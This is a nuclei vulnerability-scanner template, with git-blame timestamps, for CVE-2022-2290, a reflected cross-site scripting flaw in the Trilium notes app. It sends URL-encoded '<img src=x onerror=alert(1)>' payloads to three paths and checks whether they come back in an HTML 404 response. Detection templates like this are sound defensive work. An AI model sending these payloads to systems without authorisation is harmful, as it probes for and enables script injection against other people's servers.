nuclei-templates/cves/2022/CVE-2022-2290.yaml

38 lines
995 B
YAML
Raw Normal View History

2022-07-05 19:53:31 +00:00
id: CVE-2022-2290
info:
2022-07-06 05:01:04 +00:00
name: Trilium - Cross-Site Scripting
2022-07-05 19:53:31 +00:00
author: dbrwsky
severity: medium
description: Cross-site Scripting (XSS) - Reflected in GitHub repository zadam/trilium prior to 0.52.4, 0.53.1-beta.
reference:
- https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/
- https://github.com/zadam/trilium
2022-07-06 05:01:04 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-2290
tags: cve,cve2022,xss,trilium
2022-07-05 19:53:31 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(1)%3E'
- '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E'
- '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(1)%3E/filename'
2022-07-06 05:01:04 +00:00
stop-at-first-match: true
2022-07-05 19:53:31 +00:00
matchers-condition: and
matchers:
2022-07-06 05:01:04 +00:00
2022-07-05 19:53:31 +00:00
- type: word
words:
- '<img src=x onerror=alert(1)>'
part: body
2022-07-06 05:01:04 +00:00
2022-07-05 19:53:31 +00:00
- type: word
words:
- "text/html"
2022-07-06 05:01:04 +00:00
part: header
- type: status
status:
- 404